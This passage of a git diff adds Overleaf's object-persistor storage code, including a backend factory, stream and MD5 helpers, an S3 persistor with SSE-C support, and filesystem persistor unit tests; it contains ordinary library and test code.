PerProjectEncryptedS3Persistor, + CachedPerProjectEncryptedS3Persistor, + RootKeyEncryptionKey, +} diff --git a/libraries/object-persistor/src/PersistorFactory.js b/libraries/object-persistor/src/PersistorFactory.js new file mode 100644 index 0000000..3f11507 --- /dev/null +++ b/libraries/object-persistor/src/PersistorFactory.js @@ -0,0 +1,51 @@ +const Logger = require('@overleaf/logger') +const { SettingsError } = require('./Errors') +const GcsPersistor = require('./GcsPersistor') +const { S3Persistor } = require('./S3Persistor') +const FSPersistor = require('./FSPersistor') +const MigrationPersistor = require('./MigrationPersistor') +const { + PerProjectEncryptedS3Persistor, +} = require('./PerProjectEncryptedS3Persistor') + +function getPersistor(backend, settings) { + switch (backend) { + case 'aws-sdk': + case 's3': + return new S3Persistor(settings.s3) + case 's3SSEC': + return new PerProjectEncryptedS3Persistor(settings.s3SSEC) + case 'fs': + return new FSPersistor({ + useSubdirectories: settings.useSubdirectories, + paths: settings.paths, + }) + case 'gcs': + return new GcsPersistor(settings.gcs) + default: + throw new SettingsError('unknown backend', { backend }) + } +} + +module.exports = function create(settings) { + Logger.info( + { + backend: settings.backend, + fallback: settings.fallback && settings.fallback.backend, + }, + 'Loading backend' + ) + if (!settings.backend) { + throw new SettingsError('no backend specified - config incomplete') + } + + let persistor = getPersistor(settings.backend, settings) + + if (settings.fallback && settings.fallback.backend) { + const primary = persistor + const fallback = 
getPersistor(settings.fallback.backend, settings) + persistor = new MigrationPersistor(primary, fallback, settings.fallback) + } + + return persistor +} diff --git a/libraries/object-persistor/src/PersistorHelper.js b/libraries/object-persistor/src/PersistorHelper.js new file mode 100644 index 0000000..ad0a705 --- /dev/null +++ b/libraries/object-persistor/src/PersistorHelper.js @@ -0,0 +1,173 @@ +const Crypto = require('node:crypto') +const Stream = require('node:stream') +const { pipeline } = require('node:stream/promises') +const Logger = require('@overleaf/logger') +const Metrics = require('@overleaf/metrics') +const { WriteError, NotFoundError, AlreadyWrittenError } = require('./Errors') + +const _128KiB = 128 * 1024 +const TIMING_BUCKETS = [ + 0, 1, 2, 5, 10, 20, 50, 100, 200, 500, 1000, 2000, 5000, 10000, 20000, 50000, +] +const SIZE_BUCKETS = [ + 0, + 1_000, + 10_000, + 100_000, + _128KiB, + 1_000_000, + 10_000_000, + 50_000_000, + 100_000_000, +] + +/** + * Observes data that passes through and optionally computes hash for content. + */ +class ObserverStream extends Stream.Transform { + /** + * @param {Object} opts + * @param {string} opts.metric prefix for metrics + * @param {string} opts.bucket name of source/target bucket + * @param {string} [opts.hash] optional hash algorithm, e.g. 'md5' + */ + constructor(opts) { + super({ autoDestroy: true }) + const { metric, bucket, hash = '' } = opts + + this.bytes = 0 + this.start = performance.now() + + if (hash) { + this.hash = Crypto.createHash(hash) + } + + const onEnd = status => { + const size = this.bytes < _128KiB ? 'lt-128KiB' : 'gte-128KiB' + const labels = { size, bucket, status } + // Keep this counter metric to allow rendering long-term charts. + Metrics.count(metric, this.bytes, 1, labels) + Metrics.inc(`${metric}.hit`, 1, labels) + + if (status === 'error') return + // The below metrics are only relevant for successfully fetched objects. 
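+      // Specifically: `${metric}.size` records the object size distribution
+      // over SIZE_BUCKETS, `${metric}.latency.first-byte` the time to first
+      // byte, and `${metric}.latency` the total transfer time, both over
+      // TIMING_BUCKETS (milliseconds).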
+ + Metrics.histogram(`${metric}.size`, this.bytes, SIZE_BUCKETS, { + status, + bucket, + }) + if (this.firstByteAfterMs) { + Metrics.histogram( + `${metric}.latency.first-byte`, + this.firstByteAfterMs, + TIMING_BUCKETS, + labels + ) + } + Metrics.histogram( + `${metric}.latency`, + this.#getMsSinceStart(), + TIMING_BUCKETS, + labels + ) + } + this.once('error', () => onEnd('error')) + this.once('end', () => onEnd('success')) + } + + #getMsSinceStart() { + return performance.now() - this.start + } + + _transform(chunk, encoding, done) { + if (this.bytes === 0) { + this.firstByteAfterMs = this.#getMsSinceStart() + } + if (this.hash) { + this.hash.update(chunk) + } + this.bytes += chunk.length + this.push(chunk) + done() + } + + getHash() { + return this.hash && this.hash.digest('hex') + } +} + +module.exports = { + ObserverStream, + calculateStreamMd5, + verifyMd5, + wrapError, + hexToBase64, + base64ToHex, +} + +// returns a promise which resolves with the md5 hash of the stream +// - consumes the stream +async function calculateStreamMd5(stream) { + const hash = Crypto.createHash('md5') + hash.setEncoding('hex') + + await pipeline(stream, hash) + return hash.read() +} + +// verifies the md5 hash of a file against the supplied md5 or the one stored in +// storage if not supplied - deletes the new file if the md5 does not match and +// throws an error +async function verifyMd5(persistor, bucket, key, sourceMd5, destMd5 = null) { + if (!destMd5) { + destMd5 = await persistor.getObjectMd5Hash(bucket, key) + } + + if (sourceMd5 !== destMd5) { + try { + await persistor.deleteObject(bucket, key) + } catch (err) { + Logger.warn(err, 'error deleting file for invalid upload') + } + + throw new WriteError('source and destination hashes do not match', { + sourceMd5, + destMd5, + bucket, + key, + }) + } +} + +function wrapError(error, message, params, ErrorType) { + params = { + ...params, + cause: error, + } + if ( + error instanceof NotFoundError || + ['NoSuchKey', 'NotFound', 404, 'AccessDenied', 'ENOENT'].includes( + error.code + ) || + (error.response && error.response.statusCode === 404) + ) { + return new NotFoundError('no such file', params, error) + } else if ( + params.ifNoneMatch === '*' && + (error.code === 'PreconditionFailed' || + error.response?.statusCode === 412 || + error instanceof AlreadyWrittenError) + ) { + return new AlreadyWrittenError(message, params, error) + } else { + return new ErrorType(message, params, error) + } +} + +function base64ToHex(base64) { + return Buffer.from(base64, 'base64').toString('hex') +} + +function hexToBase64(hex) { + return Buffer.from(hex, 'hex').toString('base64') +} diff --git a/libraries/object-persistor/src/S3Persistor.js b/libraries/object-persistor/src/S3Persistor.js new file mode 100644 index 0000000..2835a27 --- /dev/null +++ b/libraries/object-persistor/src/S3Persistor.js @@ -0,0 +1,617 @@ +// @ts-check +const http = require('node:http') +const https = require('node:https') +if (http.globalAgent.maxSockets < 300) { + http.globalAgent.maxSockets = 300 +} +if (https.globalAgent.maxSockets < 300) { + https.globalAgent.maxSockets = 300 +} + +const Crypto = require('node:crypto') +const Metrics = require('@overleaf/metrics') +const AbstractPersistor = require('./AbstractPersistor') +const PersistorHelper = require('./PersistorHelper') + +const { pipeline, PassThrough } = require('node:stream') +const fs = require('node:fs') +const S3 = require('aws-sdk/clients/s3') +const { URL } = require('node:url') +const { WriteError, ReadError, 
NotFoundError } = require('./Errors') +const zlib = require('node:zlib') + +/** + * Wrapper with private fields to avoid revealing them on console, JSON.stringify or similar. + */ +class SSECOptions { + #keyAsBuffer + #keyMD5 + + /** + * @param {Buffer} keyAsBuffer + */ + constructor(keyAsBuffer) { + this.#keyAsBuffer = keyAsBuffer + this.#keyMD5 = Crypto.createHash('md5').update(keyAsBuffer).digest('base64') + } + + getPutOptions() { + return { + SSECustomerKey: this.#keyAsBuffer, + SSECustomerKeyMD5: this.#keyMD5, + SSECustomerAlgorithm: 'AES256', + } + } + + getGetOptions() { + return { + SSECustomerKey: this.#keyAsBuffer, + SSECustomerKeyMD5: this.#keyMD5, + SSECustomerAlgorithm: 'AES256', + } + } + + getCopyOptions() { + return { + CopySourceSSECustomerKey: this.#keyAsBuffer, + CopySourceSSECustomerKeyMD5: this.#keyMD5, + CopySourceSSECustomerAlgorithm: 'AES256', + } + } +} + +class S3Persistor extends AbstractPersistor { + /** @type {Map} */ + #clients = new Map() + + constructor(settings = {}) { + super() + + settings.storageClass = settings.storageClass || {} + this.settings = settings + } + + /** + * @param {string} bucketName + * @param {string} key + * @param {string} fsPath + * @return {Promise} + */ + async sendFile(bucketName, key, fsPath) { + await this.sendStream(bucketName, key, fs.createReadStream(fsPath)) + } + + /** + * @param {string} bucketName + * @param {string} key + * @param {NodeJS.ReadableStream} readStream + * @param {Object} opts + * @param {string} [opts.contentType] + * @param {string} [opts.contentEncoding] + * @param {number} [opts.contentLength] + * @param {'*'} [opts.ifNoneMatch] + * @param {SSECOptions} [opts.ssecOptions] + * @param {string} [opts.sourceMd5] + * @return {Promise} + */ + async sendStream(bucketName, key, readStream, opts = {}) { + try { + const observeOptions = { + metric: 's3.egress', // egress from us to S3 + bucket: bucketName, + } + + const observer = new PersistorHelper.ObserverStream(observeOptions) + // observer will catch errors, clean up and log a warning + pipeline(readStream, observer, () => {}) + + /** @type {S3.PutObjectRequest} */ + const uploadOptions = { + Bucket: bucketName, + Key: key, + Body: observer, + } + + if (this.settings.storageClass[bucketName]) { + uploadOptions.StorageClass = this.settings.storageClass[bucketName] + } + + if (opts.contentType) { + uploadOptions.ContentType = opts.contentType + } + if (opts.contentEncoding) { + uploadOptions.ContentEncoding = opts.contentEncoding + } + if (opts.contentLength) { + uploadOptions.ContentLength = opts.contentLength + } + if (opts.ifNoneMatch === '*') { + uploadOptions.IfNoneMatch = '*' + } + if (opts.ssecOptions) { + Object.assign(uploadOptions, opts.ssecOptions.getPutOptions()) + } + + // if we have an md5 hash, pass this to S3 to verify the upload - otherwise + // we rely on the S3 client's checksum calculation to validate the upload + let computeChecksums = false + if (opts.sourceMd5) { + uploadOptions.ContentMD5 = PersistorHelper.hexToBase64(opts.sourceMd5) + } else { + computeChecksums = true + } + + if (this.settings.disableMultiPartUpload) { + await this._getClientForBucket(bucketName, computeChecksums) + .putObject(uploadOptions) + .promise() + } else { + await this._getClientForBucket(bucketName, computeChecksums) + .upload(uploadOptions, { partSize: this.settings.partSize }) + .promise() + } + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'upload to S3 failed', + { bucketName, key, ifNoneMatch: opts.ifNoneMatch }, + WriteError + ) + } + } + 
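+  // Usage sketch (illustrative only; the bucket, key and hash literals below
+  // are made up). With `sourceMd5`, S3 verifies the upload via Content-MD5;
+  // with `ifNoneMatch: '*'`, an already-existing object makes the call fail,
+  // which PersistorHelper.wrapError() surfaces as AlreadyWrittenError:
+  //
+  //   await persistor.sendStream('my-bucket', 'some/key', readStream, {
+  //     sourceMd5: '6f8db599de986fab7a21625b7916589c',
+  //     ifNoneMatch: '*',
+  //   })
+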
+  /**
+   * @param {string} bucketName
+   * @param {string} key
+   * @param {Object} [opts]
+   * @param {number} [opts.start]
+   * @param {number} [opts.end]
+   * @param {boolean} [opts.autoGunzip]
+   * @param {SSECOptions} [opts.ssecOptions]
+   * @return {Promise<NodeJS.ReadableStream>}
+   */
+  async getObjectStream(bucketName, key, opts) {
+    opts = opts || {}
+
+    const params = {
+      Bucket: bucketName,
+      Key: key,
+    }
+    if (opts.start != null && opts.end != null) {
+      params.Range = `bytes=${opts.start}-${opts.end}`
+    }
+    if (opts.ssecOptions) {
+      Object.assign(params, opts.ssecOptions.getGetOptions())
+    }
+    const observer = new PersistorHelper.ObserverStream({
+      metric: 's3.ingress', // ingress from S3 to us
+      bucket: bucketName,
+    })
+
+    const req = this._getClientForBucket(bucketName).getObject(params)
+    const stream = req.createReadStream()
+
+    let contentEncoding
+    try {
+      await new Promise((resolve, reject) => {
+        req.on('httpHeaders', (statusCode, headers) => {
+          switch (statusCode) {
+            case 200: // full response
+            case 206: // partial response
+              contentEncoding = headers['content-encoding']
+              return resolve(undefined)
+            case 403: // AccessDenied
+              return // handled by stream.on('error') handler below
+            case 404: // NoSuchKey
+              return reject(new NotFoundError('not found'))
+            default:
+            // handled by stream.on('error') handler below
+          }
+        })
+        // The AWS SDK forwards any request errors to the stream.
+        // It can also emit additional errors on the stream before streaming starts.
+        stream.on('error', reject)
+        // The AWS SDK kicks off the request in the next event loop cycle.
+      })
+    } catch (err) {
+      throw PersistorHelper.wrapError(
+        err,
+        'error reading file from S3',
+        { bucketName, key, opts },
+        ReadError
+      )
+    }
+    // Return a PassThrough stream with a minimal interface. It will buffer
+    // until the caller starts reading, and it will emit errors from the source
+    // stream (Stream.pipeline passes errors along).
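+    // If opts.autoGunzip is set and the object was stored with
+    // Content-Encoding: gzip, a gunzip transform is spliced into the pipeline
+    // below, so callers receive decompressed bytes.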
+ const pass = new PassThrough() + const transformer = [] + if (contentEncoding === 'gzip' && opts.autoGunzip) { + transformer.push(zlib.createGunzip()) + } + pipeline(stream, observer, ...transformer, pass, err => { + if (err) req.abort() + }) + return pass + } + + /** + * @param {string} bucketName + * @param {string} key + * @return {Promise} + */ + async getRedirectUrl(bucketName, key) { + const expiresSeconds = Math.round(this.settings.signedUrlExpiryInMs / 1000) + try { + return await this._getClientForBucket(bucketName).getSignedUrlPromise( + 'getObject', + { + Bucket: bucketName, + Key: key, + Expires: expiresSeconds, + } + ) + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'error generating signed url for S3 file', + { bucketName, key }, + ReadError + ) + } + } + + /** + * @param {string} bucketName + * @param {string} key + * @param {string} [continuationToken] + * @return {Promise} + */ + async deleteDirectory(bucketName, key, continuationToken) { + let response + const options = { Bucket: bucketName, Prefix: key } + if (continuationToken) { + options.ContinuationToken = continuationToken + } + + try { + response = await this._getClientForBucket(bucketName) + .listObjectsV2(options) + .promise() + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'failed to list objects in S3', + { bucketName, key }, + ReadError + ) + } + + const objects = response.Contents?.map(item => ({ Key: item.Key || '' })) + if (objects?.length) { + try { + await this._getClientForBucket(bucketName) + .deleteObjects({ + Bucket: bucketName, + Delete: { + Objects: objects, + Quiet: true, + }, + }) + .promise() + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'failed to delete objects in S3', + { bucketName, key }, + WriteError + ) + } + } + + if (response.IsTruncated) { + await this.deleteDirectory( + bucketName, + key, + response.NextContinuationToken + ) + } + } + + /** + * @param {string} bucketName + * @param {string} key + * @param {Object} opts + * @param {SSECOptions} [opts.ssecOptions] + * @return {Promise} + */ + async #headObject(bucketName, key, opts = {}) { + const params = { Bucket: bucketName, Key: key } + if (opts.ssecOptions) { + Object.assign(params, opts.ssecOptions.getGetOptions()) + } + try { + return await this._getClientForBucket(bucketName) + .headObject(params) + .promise() + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'error getting size of s3 object', + { bucketName, key }, + ReadError + ) + } + } + + /** + * @param {string} bucketName + * @param {string} key + * @param {Object} opts + * @param {SSECOptions} [opts.ssecOptions] + * @return {Promise} + */ + async getObjectSize(bucketName, key, opts = {}) { + const response = await this.#headObject(bucketName, key, opts) + return response.ContentLength || 0 + } + + /** + * @param {string} bucketName + * @param {string} key + * @param {Object} opts + * @param {SSECOptions} [opts.ssecOptions] + * @return {Promise} + */ + async getObjectStorageClass(bucketName, key, opts = {}) { + const response = await this.#headObject(bucketName, key, opts) + return response.StorageClass + } + + /** + * @param {string} bucketName + * @param {string} key + * @param {Object} opts + * @param {SSECOptions} [opts.ssecOptions] + * @param {boolean} [opts.etagIsNotMD5] + * @return {Promise} + */ + async getObjectMd5Hash(bucketName, key, opts = {}) { + try { + if (!opts.etagIsNotMD5) { + const response = await this.#headObject(bucketName, key, opts) + const md5 = S3Persistor._md5FromResponse(response) + if 
(md5) { + return md5 + } + } + // etag is not in md5 format + Metrics.inc('s3.md5Download') + return await PersistorHelper.calculateStreamMd5( + await this.getObjectStream(bucketName, key, opts) + ) + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'error getting hash of s3 object', + { bucketName, key }, + ReadError + ) + } + } + + /** + * @param {string} bucketName + * @param {string} key + * @return {Promise} + */ + async deleteObject(bucketName, key) { + try { + await this._getClientForBucket(bucketName) + .deleteObject({ Bucket: bucketName, Key: key }) + .promise() + } catch (err) { + // s3 does not give us a NotFoundError here + throw PersistorHelper.wrapError( + err, + 'failed to delete file in S3', + { bucketName, key }, + WriteError + ) + } + } + + /** + * @param {string} bucketName + * @param {string} sourceKey + * @param {string} destKey + * @param {Object} opts + * @param {SSECOptions} [opts.ssecSrcOptions] + * @param {SSECOptions} [opts.ssecOptions] + * @return {Promise} + */ + async copyObject(bucketName, sourceKey, destKey, opts = {}) { + const params = { + Bucket: bucketName, + Key: destKey, + CopySource: `${bucketName}/${sourceKey}`, + } + if (opts.ssecSrcOptions) { + Object.assign(params, opts.ssecSrcOptions.getCopyOptions()) + } + if (opts.ssecOptions) { + Object.assign(params, opts.ssecOptions.getPutOptions()) + } + try { + await this._getClientForBucket(bucketName).copyObject(params).promise() + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'failed to copy file in S3', + params, + WriteError + ) + } + } + + /** + * @param {string} bucketName + * @param {string} key + * @param {Object} opts + * @param {SSECOptions} [opts.ssecOptions] + * @return {Promise} + */ + async checkIfObjectExists(bucketName, key, opts) { + try { + await this.getObjectSize(bucketName, key, opts) + return true + } catch (err) { + if (err instanceof NotFoundError) { + return false + } + throw PersistorHelper.wrapError( + err, + 'error checking whether S3 object exists', + { bucketName, key }, + ReadError + ) + } + } + + /** + * @param {string} bucketName + * @param {string} key + * @param {string} [continuationToken] + * @return {Promise} + */ + async directorySize(bucketName, key, continuationToken) { + try { + const options = { + Bucket: bucketName, + Prefix: key, + } + if (continuationToken) { + options.ContinuationToken = continuationToken + } + const response = await this._getClientForBucket(bucketName) + .listObjectsV2(options) + .promise() + + const size = + response.Contents?.reduce((acc, item) => (item.Size || 0) + acc, 0) || 0 + if (response.IsTruncated) { + return ( + size + + (await this.directorySize( + bucketName, + key, + response.NextContinuationToken + )) + ) + } + return size + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'error getting directory size in S3', + { bucketName, key }, + ReadError + ) + } + } + + /** + * @param {string} bucket + * @param {boolean} computeChecksums + * @return {S3} + * @private + */ + _getClientForBucket(bucket, computeChecksums = false) { + /** @type {S3.Types.ClientConfiguration} */ + const clientOptions = {} + const cacheKey = `${bucket}:${computeChecksums}` + if (computeChecksums) { + clientOptions.computeChecksums = true + } + let client = this.#clients.get(cacheKey) + if (!client) { + client = new S3( + this._buildClientOptions( + this.settings.bucketCreds?.[bucket], + clientOptions + ) + ) + this.#clients.set(cacheKey, client) + } + return client + } + + /** + * @param {Object} bucketCredentials + * 
@param {S3.Types.ClientConfiguration} clientOptions + * @return {S3.Types.ClientConfiguration} + * @private + */ + _buildClientOptions(bucketCredentials, clientOptions) { + const options = clientOptions || {} + + if (bucketCredentials) { + options.credentials = { + accessKeyId: bucketCredentials.auth_key, + secretAccessKey: bucketCredentials.auth_secret, + } + } else if (this.settings.key) { + options.credentials = { + accessKeyId: this.settings.key, + secretAccessKey: this.settings.secret, + } + } else { + // Use the default credentials provider (process.env -> SSP -> ini -> IAM) + // Docs: https://docs.aws.amazon.com/AWSJavaScriptSDK/latest/AWS/CredentialProviderChain.html#defaultProviders-property + } + + if (this.settings.endpoint) { + const endpoint = new URL(this.settings.endpoint) + options.endpoint = this.settings.endpoint + options.sslEnabled = endpoint.protocol === 'https:' + } + + // path-style access is only used for acceptance tests + if (this.settings.pathStyle) { + options.s3ForcePathStyle = true + } + + for (const opt of ['httpOptions', 'maxRetries', 'region']) { + if (this.settings[opt]) { + options[opt] = this.settings[opt] + } + } + + if (options.sslEnabled && this.settings.ca && !options.httpOptions?.agent) { + options.httpOptions = options.httpOptions || {} + options.httpOptions.agent = new https.Agent({ + rejectUnauthorized: true, + ca: this.settings.ca, + }) + } + + return options + } + + /** + * @param {S3.HeadObjectOutput} response + * @return {string|null} + * @private + */ + static _md5FromResponse(response) { + const md5 = (response.ETag || '').replace(/[ "]/g, '') + if (!md5.match(/^[a-f0-9]{32}$/)) { + return null + } + + return md5 + } +} + +module.exports = { + S3Persistor, + SSECOptions, +} diff --git a/libraries/object-persistor/test/Init.js b/libraries/object-persistor/test/Init.js new file mode 100644 index 0000000..2721d2f --- /dev/null +++ b/libraries/object-persistor/test/Init.js @@ -0,0 +1,33 @@ +const SandboxedModule = require('sandboxed-module') +const chai = require('chai') +const sinon = require('sinon') + +chai.use(require('sinon-chai')) +chai.use(require('chai-as-promised')) + +SandboxedModule.configure({ + requires: { + '@overleaf/logger': { + debug() {}, + log() {}, + info() {}, + warn() {}, + error() {}, + err() {}, + }, + '@overleaf/metrics': { + inc: sinon.stub(), + count: sinon.stub(), + histogram: sinon.stub(), + Timer: class Timer { + done() {} + }, + }, + }, + globals: { Buffer, Math, console, process, URL }, + sourceTransformers: { + removeNodePrefix: function (source) { + return source.replace(/require\(['"]node:/g, "require('") + }, + }, +}) diff --git a/libraries/object-persistor/test/unit/FSPersistorTests.js b/libraries/object-persistor/test/unit/FSPersistorTests.js new file mode 100644 index 0000000..dc7a5c5 --- /dev/null +++ b/libraries/object-persistor/test/unit/FSPersistorTests.js @@ -0,0 +1,417 @@ +const crypto = require('node:crypto') +const { expect } = require('chai') +const mockFs = require('mock-fs') +const fs = require('node:fs') +const fsPromises = require('node:fs/promises') +const Path = require('node:path') +const StreamPromises = require('node:stream/promises') +const SandboxedModule = require('sandboxed-module') +const Errors = require('../../src/Errors') + +const MODULE_PATH = '../../src/FSPersistor.js' + +describe('FSPersistorTests', function () { + const localFiles = { + '/uploads/info.txt': Buffer.from('This information is critical', { + encoding: 'utf-8', + }), + '/uploads/other.txt': Buffer.from('Some other 
content', { + encoding: 'utf-8', + }), + } + const location = '/bucket' + const files = { + wombat: 'animals/wombat.tex', + giraffe: 'animals/giraffe.tex', + potato: 'vegetables/potato.tex', + } + + const scenarios = [ + { + description: 'default settings', + settings: {}, + fsPath: key => Path.join(location, key.replaceAll('/', '_')), + }, + { + description: 'with useSubdirectories = true', + settings: { useSubdirectories: true }, + fsPath: key => Path.join(location, key), + }, + ] + + for (const scenario of scenarios) { + describe(scenario.description, function () { + let persistor + + beforeEach(function () { + const FSPersistor = SandboxedModule.require(MODULE_PATH, { + requires: { + 'fs/promises': fsPromises, + 'stream/promises': StreamPromises, + './Errors': Errors, + }, + }) + persistor = new FSPersistor(scenario.settings) + }) + + beforeEach(function () { + mockFs({ + ...localFiles, + '/not-a-dir': + 'This regular file is meant to prevent using this path as a directory', + '/directory/subdirectory': {}, + }) + }) + + afterEach(function () { + mockFs.restore() + }) + + describe('sendFile', function () { + it('should copy the file', async function () { + await persistor.sendFile(location, files.wombat, '/uploads/info.txt') + const contents = await fsPromises.readFile( + scenario.fsPath(files.wombat) + ) + expect(contents.equals(localFiles['/uploads/info.txt'])).to.be.true + }) + + it('should return an error if the file cannot be stored', async function () { + await expect( + persistor.sendFile('/not-a-dir', files.wombat, '/uploads/info.txt') + ).to.be.rejectedWith(Errors.WriteError) + }) + }) + + describe('sendStream', function () { + let stream + + describe("when the file doesn't exist", function () { + beforeEach(function () { + stream = fs.createReadStream('/uploads/info.txt') + }) + + it('should write the stream to disk', async function () { + await persistor.sendStream(location, files.wombat, stream) + const contents = await fsPromises.readFile( + scenario.fsPath(files.wombat) + ) + expect(contents.equals(localFiles['/uploads/info.txt'])).to.be.true + }) + + it('should delete the temporary file', async function () { + await persistor.sendStream(location, files.wombat, stream) + const entries = await fsPromises.readdir(location) + const tempDirs = entries.filter(dir => dir.startsWith('tmp-')) + expect(tempDirs).to.be.empty + }) + + describe('on error', function () { + beforeEach(async function () { + await expect( + persistor.sendStream('/not-a-dir', files.wombat, stream) + ).to.be.rejectedWith(Errors.WriteError) + }) + + it('should not write the target file', async function () { + await expect(fsPromises.access(scenario.fsPath(files.wombat))).to + .be.rejected + }) + + it('should delete the temporary file', async function () { + await persistor.sendStream(location, files.wombat, stream) + const entries = await fsPromises.readdir(location) + const tempDirs = entries.filter(dir => dir.startsWith('tmp-')) + expect(tempDirs).to.be.empty + }) + }) + + describe('when the md5 hash matches', function () { + it('should write the stream to disk', async function () { + await persistor.sendStream(location, files.wombat, stream, { + sourceMd5: md5(localFiles['/uploads/info.txt']), + }) + const contents = await fsPromises.readFile( + scenario.fsPath(files.wombat) + ) + expect(contents.equals(localFiles['/uploads/info.txt'])).to.be + .true + }) + }) + + describe('when the md5 hash does not match', function () { + beforeEach(async function () { + await expect( + persistor.sendStream(location, 
files.wombat, stream, { + sourceMd5: md5('wrong content'), + }) + ).to.be.rejectedWith(Errors.WriteError) + }) + + it('should not write the target file', async function () { + await expect(fsPromises.access(scenario.fsPath(files.wombat))).to + .be.rejected + }) + + it('should delete the temporary file', async function () { + await persistor.sendStream(location, files.wombat, stream) + const entries = await fsPromises.readdir(location) + const tempDirs = entries.filter(dir => dir.startsWith('tmp-')) + expect(tempDirs).to.be.empty + }) + }) + }) + + describe('when the file already exists', function () { + let stream + + beforeEach(async function () { + await persistor.sendFile( + location, + files.wombat, + '/uploads/info.txt' + ) + stream = fs.createReadStream('/uploads/other.txt') + }) + + it('should write the stream to disk', async function () { + await persistor.sendStream(location, files.wombat, stream) + const contents = await fsPromises.readFile( + scenario.fsPath(files.wombat) + ) + expect(contents.equals(localFiles['/uploads/other.txt'])).to.be.true + }) + + it('should delete the temporary file', async function () { + await persistor.sendStream(location, files.wombat, stream) + const entries = await fsPromises.readdir(location) + const tempDirs = entries.filter(dir => dir.startsWith('tmp-')) + expect(tempDirs).to.be.empty + }) + + describe('on error', function () { + beforeEach(async function () { + await expect( + persistor.sendStream('/not-a-dir', files.wombat, stream) + ).to.be.rejectedWith(Errors.WriteError) + }) + + it('should not update the target file', async function () { + const contents = await fsPromises.readFile( + scenario.fsPath(files.wombat) + ) + expect(contents.equals(localFiles['/uploads/info.txt'])).to.be + .true + }) + + it('should delete the temporary file', async function () { + await persistor.sendStream(location, files.wombat, stream) + const entries = await fsPromises.readdir(location) + const tempDirs = entries.filter(dir => dir.startsWith('tmp-')) + expect(tempDirs).to.be.empty + }) + }) + + describe('when the md5 hash matches', function () { + it('should write the stream to disk', async function () { + await persistor.sendStream(location, files.wombat, stream, { + sourceMd5: md5(localFiles['/uploads/other.txt']), + }) + const contents = await fsPromises.readFile( + scenario.fsPath(files.wombat) + ) + expect(contents.equals(localFiles['/uploads/other.txt'])).to.be + .true + }) + }) + + describe('when the md5 hash does not match', function () { + beforeEach(async function () { + await expect( + persistor.sendStream(location, files.wombat, stream, { + sourceMd5: md5('wrong content'), + }) + ).to.be.rejectedWith(Errors.WriteError) + }) + + it('should not update the target file', async function () { + const contents = await fsPromises.readFile( + scenario.fsPath(files.wombat) + ) + expect(contents.equals(localFiles['/uploads/info.txt'])).to.be + .true + }) + + it('should delete the temporary file', async function () { + await persistor.sendStream(location, files.wombat, stream) + const entries = await fsPromises.readdir(location) + const tempDirs = entries.filter(dir => dir.startsWith('tmp-')) + expect(tempDirs).to.be.empty + }) + }) + }) + }) + + describe('getObjectStream', function () { + beforeEach(async function () { + await persistor.sendFile(location, files.wombat, '/uploads/info.txt') + }) + + it('should return a string with the object contents', async function () { + const stream = await persistor.getObjectStream(location, files.wombat) + const 
contents = await streamToBuffer(stream)
+          expect(contents.equals(localFiles['/uploads/info.txt'])).to.be.true
+        })
+
+        it('should support ranges', async function () {
+          const stream = await persistor.getObjectStream(
+            location,
+            files.wombat,
+            {
+              start: 5,
+              end: 16,
+            }
+          )
+          const contents = await streamToBuffer(stream)
+          // end is inclusive in ranges, but exclusive in slice()
+          expect(contents.equals(localFiles['/uploads/info.txt'].slice(5, 17)))
+            .to.be.true
+        })
+
+        it('should give a NotFoundError if the file does not exist', async function () {
+          await expect(
+            persistor.getObjectStream(location, 'does-not-exist')
+          ).to.be.rejectedWith(Errors.NotFoundError)
+        })
+      })
+
+      describe('getObjectSize', function () {
+        beforeEach(async function () {
+          await persistor.sendFile(location, files.wombat, '/uploads/info.txt')
+        })
+
+        it('should return the file size', async function () {
+          expect(
+            await persistor.getObjectSize(location, files.wombat)
+          ).to.equal(localFiles['/uploads/info.txt'].length)
+        })
+
+        it('should throw a NotFoundError if the file does not exist', async function () {
+          await expect(
+            persistor.getObjectSize(location, 'does-not-exist')
+          ).to.be.rejectedWith(Errors.NotFoundError)
+        })
+      })
+
+      describe('copyObject', function () {
+        beforeEach(async function () {
+          await persistor.sendFile(location, files.wombat, '/uploads/info.txt')
+        })
+
+        it('should copy the file to the new location', async function () {
+          await persistor.copyObject(location, files.wombat, files.potato)
+          const contents = await fsPromises.readFile(
+            scenario.fsPath(files.potato)
+          )
+          expect(contents.equals(localFiles['/uploads/info.txt'])).to.be.true
+        })
+      })
+
+      describe('deleteObject', function () {
+        beforeEach(async function () {
+          await persistor.sendFile(location, files.wombat, '/uploads/info.txt')
+          await fsPromises.access(scenario.fsPath(files.wombat))
+        })
+
+        it('should delete the file', async function () {
+          await persistor.deleteObject(location, files.wombat)
+          await expect(fsPromises.access(scenario.fsPath(files.wombat))).to.be
+            .rejected
+        })
+
+        it("should ignore files that don't exist", async function () {
+          await persistor.deleteObject(location, 'does-not-exist')
+        })
+      })
+
+      describe('deleteDirectory', function () {
+        beforeEach(async function () {
+          for (const file of Object.values(files)) {
+            await persistor.sendFile(location, file, '/uploads/info.txt')
+            await fsPromises.access(scenario.fsPath(file))
+          }
+        })
+
+        it('should delete all files under the directory', async function () {
+          await persistor.deleteDirectory(location, 'animals')
+          for (const file of [files.wombat, files.giraffe]) {
+            await expect(fsPromises.access(scenario.fsPath(file))).to.be
+              .rejected
+          }
+        })
+
+        it('should not delete files under other directories', async function () {
+          await persistor.deleteDirectory(location, 'animals')
+          await fsPromises.access(scenario.fsPath(files.potato))
+        })
+
+        it("should ignore directories that don't exist", async function () {
+          await persistor.deleteDirectory(location, 'does-not-exist')
+          for (const file of Object.values(files)) {
+            await fsPromises.access(scenario.fsPath(file))
+          }
+        })
+      })
+
+      describe('checkIfObjectExists', function () {
+        beforeEach(async function () {
+          await persistor.sendFile(location, files.wombat, '/uploads/info.txt')
+        })
+
+        it('should return true for existing files', async function () {
+          expect(
+            await persistor.checkIfObjectExists(location, files.wombat)
+          ).to.equal(true)
+        })
+
+        it('should return false for non-existing
